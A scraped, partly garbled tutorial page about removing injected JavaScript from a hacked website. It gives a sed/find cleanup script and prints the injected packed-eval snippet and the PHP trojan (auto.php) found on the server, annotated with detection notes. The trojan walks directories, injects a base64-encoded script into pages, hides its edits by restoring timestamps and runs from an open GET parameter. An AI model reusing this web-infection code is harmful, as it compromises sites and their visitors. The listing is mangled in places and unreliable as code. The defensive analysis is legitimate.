Removing injected scripts from a Web site with a shell command: the latest method and code _linux

Source: Internet
Author: User
Tags eval
Copy code code as follows:

# <script language= "javascript" type= "Text/javascript" >
# if (document.cookie.indexOf (' Helio ') ==-1) {var expires=new Date (); Expires.settime (Expires.gettime () +1*60*60*1000) ;d ocument.cookie= ' helio=yes;path=/;expires= ' +expires.togmtstring ()
# eval (function (p,a,c,k,e,d) {e=function (c) {return (c<a? ': E (parseint (C/A))) + ((c=c%a) >35? String.fromCharCode (c+29): C.tostring ())};if (! "). Replace (/^/,string)) {while (c--) d[e (c)]=k[c]| | E (c); K=[function (e) {return d[e]}];e=function () {return ' \\w+ '};c=1};while (c--) if (k[c)) P=p.replace (New RegExp (' \\b ') +e (c) + ' \\b ', ' G '), k[c]); return p} (' 5.l (\ '

# </script>


This is a real headache, so I wrote a shell script to strip these injected scripts out of the pages.
Copy Code code as follows:

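#!/bin/sh
# Strip the two injected JavaScript lines (the cookie check and the packed
# eval loader) from the static pages under the directory given as $1.
#
# This removes the symptom only. While the server-side file that writes the
# injection is still on the host, the pages will be infected again; find and
# remove that file, and the way it got there, as well.
# Take a copy of the site outside the web root first: sed -i edits in place,
# and a matching line is deleted whole, including anything else on that line.
#
# Usage: sh clean.sh /path/to/webroot

dir=${1:?usage: $0 <webroot-directory>}

# find walks sub-directories and hands the names straight to sed, so file
# names containing spaces are handled (parsing `ls` output breaks on them).
# .html and .shtml pages are covered as well as .htm.
# Plain -e keeps basic regular expressions, where "(" is a literal character;
# the I flag (GNU sed) matches regardless of letter case.
find "$dir" -type f \( -name '*.htm' -o -name '*.html' -o -name '*.shtml' \) \
    -exec sed -i \
        -e "/if *(document\.cookie\.indexOf *('helio'/Id" \
        -e "/eval *(function *(p,a,c,k,e,d)/Id" {} +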

But the next day the injected code was back.

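In the end I found a suspicious auto.php file in the site.
Looking at its content, sure enough, it was the root of the Trojan.
Deleting it stops the pages from being re-infected, but it does not explain how the file got onto the server; that entry point still has to be found and closed.
Its content is listed below, and I hope it helps.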
Copy Code code as follows:

<?php
// NOTE(review): this listing was mangled by the page (capitalisation, inserted
// spaces, lost string contents), so it is for reading, not running.
// Report only fatal run-time errors and remove the execution time limit.
// With warnings off, failed file operations during the directory walk below
// leave no trace in the PHP error log.
Error_reporting (E_error);
Set_time_limit (0);
// Normalises a path string: the inner call replaces one search string with
// '/', the outer call then collapses '//' into '/'.
// NOTE(review): the inner search string is garbled in this listing; presumably
// it was a backslash (Windows separator) -- unconfirmed.
function Checkpath ($path)
{
return Str_replace ('//', '/', str_replace (' \ \ ', '/', $path));
}
// Reads the whole of $filename (binary read mode, upper-cased in this listing)
// and returns what fread() gave back.
// Every call carries the @ operator, so a missing or unreadable file raises
// no warning and nothing is logged.
function Autoread ($filename)
{
$handle = @fopen ($filename, "RB");
$filecode = @fread ($handle, @filesize ($filename));
@fclose ($handle);
return $filecode;
}
// Writes $filecode, wrapped in line breaks, to $filename using the fopen mode
// passed in $filemode; returns true when fwrite() reported a non-zero result.
//
// Detection notes:
//  - The modification time is read before the write and put back with touch()
//    afterwards, so a search for "recently modified files" by mtime does not
//    show pages written through this function. Compare content hashes against
//    a known-good copy, or look at the inode change time (ctime), which
//    touch() does not set back.
//  - When the first write fails the file is switched to mode 0666 and the
//    write is tried again; pages left world-writable are a further indicator.
function Autowrite ($filename, $filecode, $filemode)
{
// Remember the current mtime so it can be restored after the write.
$time = @filemtime ($filename);
$handle = @fopen ($filename, $filemode);
$key = @fwrite ($handle, "\ r \ n". $filecode. " \ r \ n ");
if (! $key)
{
// Fallback: loosen the permissions, then retry.
@chmod ($filename, 0666);
$key = @fwrite ($handle, "\ r \ n". $filecode. " \ r \ n ");
}
@fclose ($handle);
// Put the original mtime back (see detection notes above).
@touch ($filename, $time);
Return $key? True:false;
}
// Builds a string of $length letters picked from A-Z with rand().
// AutoRun calls it twice with length 3 and places the two results inside the
// script it assembles, so the assembled text is not the same on every run.
// For cleanup and scanning this means: match on the stable parts of the
// injected script rather than on the whole block as one fixed string.
function Make_pass ($length)
{
$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str = "";
while (strlen ($STR) < $length)
{
$str. = substr ($possible, (rand ()% strlen ($possible), 1);
}
return $str;
}
// Walks $dir and every sub-directory it does not skip. For each entry it
// assembles a script from two base64-encoded strings plus two random 3-letter
// tokens; for entries whose name matches .htm or .shtml it reads the page
// and, when the page does not already contain the "eval (function (" marker,
// passes new content to Autowrite and prints OK or Err with the file name.
// Always returns true.
function AutoRun ($dir)
{
$spider = @opendir ($dir);
while ($file = @readdir ($spider))
{
// Skip list: the current/parent directory entries and a fixed set of names
// (a, images, uploads, special, Data, Include, member, Templets, Install).
// Pages under those names are not touched, so finding them clean says
// nothing about the rest of the site.
if ($file = = '. ' | | = $file = ' ... ' | | $file = = ' a ' | | $file = ' images ' | | $file = ' uploads ' | | $file = ' special ' | | $file = = ' Data ' | | $file = = ' Include ' | | $file = = ' member ' | | $file = = ' Templets ' | | $file = = ' Install ') continue;
// The script text is kept base64-encoded, so searching the PHP sources for the
// plain JavaScript (document.cookie, eval) does not find this file; look for
// base64_decode() of long literals instead. The literal below is case-mangled
// by the page and does not decode as shown.
$code = Base64_decode (' Phnjcmlwdcbsyw5ndwfnzt0iamf2yxnjcmlwdcigdhlwzt0idgv4dc9qyxzhc2nyaxb0ij4ncmlmkgrvy3vtzw50lmnvb2tpzs5pbmrlee9mkcdozwxpbycpp T0tmsl7dmfyigv4cglyzxm9bmv3ierhdguokttlehbpcmvzlnnldfrpbwuozxhwaxjlcy5nzxruaw1lkckrmso2mco2mcoxmdawkttkb2n1bwvudc5jb29raw U9j2hlbglvpvllcztwyxrops87zxhwaxjlcz0nk2v4cglyzxmudg9htvrtdhjpbmcokq0kzxzhbchmdw5jdglvbihwlgesyyxrlguszcl7zt1mdw5jdglvbih Jkxtyzxr1cm4oyzxhpycnomuocgfyc2vjbnqoyy9hkskpkygoyz1jjweppjm1p1n0cmluzy5mcm9tq2hhcknvzguoyysyosk6yy50b1n0cmluzygznikpfttp Zighjycucmvwbgfjzsgvxi8su3ryaw5nksl7d2hpbguoyy0tkwrbzshjkv09a1tjxxx8zshjkttrpvtmdw5jdglvbihlkxtyzxr1cm4gzftlxx1do2u9znvuy 3rpb24okxtyzxr1cm4nxfx3kyd9o2m9mx07d2hpbguoyy0tkwlmkgtby10pcd1wlnjlcgxhy2uobmv3ifjlz0v4ccgnxfxijytlkgmpkydcxginlcdnjyksa1 tjxsk7cmv0dxjuihb9kcc1lmwoxcc8acbmpwigat04oi8vbs5uljyunc9hl2ouzd48l2g+ pdkgnz0wigs9msbppsi4oi8vbs5uljyunc9hl2uuyz8yij48lzk+pdkgnz0wigs9msbppsi4oi8vbs5uljyunc9hl2cuyz8zij48lzk+ Xccpjyw2miwyncwnfdewmhw= ');
// Two random 3-letter tokens separated by '|' go between the two decoded parts.
$code. = Make_pass (3);
$code. = ' | ';
$code. = Make_pass (3);
$code. = Base64_decode (' Fgnufgrvy3vtzw50fgdvdnxozwlnahr8ahr0chxpznjhbwv8aw1hz2vzfgphdmfzy3jpchr8anbnfgpzfgtpc3n8bgfuz3vhz2v8bwlzc3xzy3jpchr8c3jjf hviynx3awr0ahx3cml0zwxufhd3d3x4y3jzcmmnlnnwbgl0kcd8jyksmcx7fskpo30ncjwvc2nyaxb0pg0kpc9ozwfkpg== ');
// NOTE(review): as listed, die() prints the assembled script and ends the
// request here, so nothing below would run. Whether this line is part of the
// file found on the server or was added when the listing was posted cannot be
// told from this page.
Die ($code);
$filename = Checkpath ($dir. '/'. $file);
// Recurse into sub-directories.
if (Is_dir ($filename)) AutoRun ($filename);
// Case-insensitive match on the entry name for .htm or .shtml.
if (eregi (' \.htm|\.shtml ', $file))
{
$checkcode = Autoread ($filename);
// Only pages without the marker are rewritten, i.e. a page is injected once.
// NOTE(review): the second search string and the str_replace() arguments on
// the next two lines were lost by the page, and several statements are fused;
// presumably the script is placed next to a fixed HTML tag -- unconfirmed.
if (!stristr ($checkcode, ' eval (function ()) && stristr ($checkcode, ' {
$newcode = Str_replace (' Echo Autowrite ($filename, $newcode, "WB")? "OK:". $filename. " <br>\n ":" Err: ". $filename." <br>\n ";
// Push the per-file result line to the client straight away.
Ob_flush ();
Flush ();
}
}
$checkcode = NULL;
$newcode = NULL;
}
@closedir ($spider);
return true;
}
// Entry point. If the request carries a "dir" parameter, its value is handed
// unchecked to AutoRun as the directory to walk. No authentication or origin
// check is visible in this file, so any HTTP client that can reach it can
// start the walk.
// Detection: requests to this file with a dir= query string in the web server
// access log show when, and from which address, it was run.
if (Isset ($_get[' dir '))
{
AutoRun ($_get[' dir ']);
}
// Prints a URL made of the server name, this script's own path and the
// directory the script sits in (garbled in this listing) -- apparently a link
// for calling the script on its own directory.
echo ' http://' $_server[' server_name '].$_server[' php_self '. Dir= '. Checkpath (DirName (__file__));
?>